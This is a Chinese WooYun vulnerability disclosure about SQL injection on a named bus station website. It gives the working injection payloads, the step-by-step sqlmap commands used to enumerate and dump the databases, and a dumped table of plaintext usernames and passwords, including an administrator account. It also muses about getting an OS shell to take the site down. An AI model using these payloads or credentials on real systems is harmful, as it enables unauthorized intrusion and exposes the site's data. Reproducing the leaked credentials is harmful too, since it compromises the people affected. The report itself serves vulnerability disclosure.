WooYun.org

问题站点，连云港新浦汽车客运总站
URL：http://www.lygbus.com/shownews.php?aou=103
注入点：
Place: GET
Parameter: aou
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: aou=103 AND 2729=2729
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: aou=103 AND (SELECT 692 FROM(SELECT COUNT(*),CONCAT(CHAR(58,104,102
,119,58),(SELECT (CASE WHEN (692=692) THEN 1 ELSE 0 END)),CHAR(58,113,113,117,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: aou=-5383 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,1
04,102,119,58),IFNULL(CAST(CHAR(81,102,89,109,101,72,72,120,89,90) AS CHAR),CHAR
(32)),CHAR(58,113,113,117,58)), NULL, NULL, NULL, NULL#
---
sqlmap -u "http://www.lygbus.com/shownews.php?aou=103" --current-user
当前用户：current user: 'lygbus@localhost'
数据库：
sqlmap -u "http://www.lygbus.com/shownews.php?aou=103" --dbs

随便找了个库，拖test库51张表
sqlmap -u "http://www.lygbus.com/shownews.php?aou=103" -D "test" --tables
不知道表里还有那些数据，懒得看了

拖lygbus库13张表
sqlmap -u "http://www.lygbus.com/shownews.php?aou=103" -D "lygbus" --tables

随便找了个userpower表看看字段
sqlmap -u "http://www.lygbus.com/shownews.php?aou=103" -D "lygbus" -T "userpower" --column

直接看字段数据
sqlmap -u "http://www.lygbus.com/shownews.php?aou=103" -D "lygbus" -T "userpower" --dump

逗，明文存储密码，都不md5加密下，不过话又说回来了，谁管这玩意啊，估计研发自己弄着玩的也说不定
Database: lygbus
Table: userpower
[2 entries]
+--------+-------+----+----------+--------+
| beizhu | cname | id | password | upower |
+--------+-------+----+----------+--------+
| 系统管理员 | 888 | 2 | 888888 | 管理 |
| 浏览用户 | guest | 4 | 123456 | 查看 |
+--------+-------+----+----------+--------+
有可能有os-shell吧，有os-shell，这站估计就可以挂了，没有深入找网站物理路径了

exit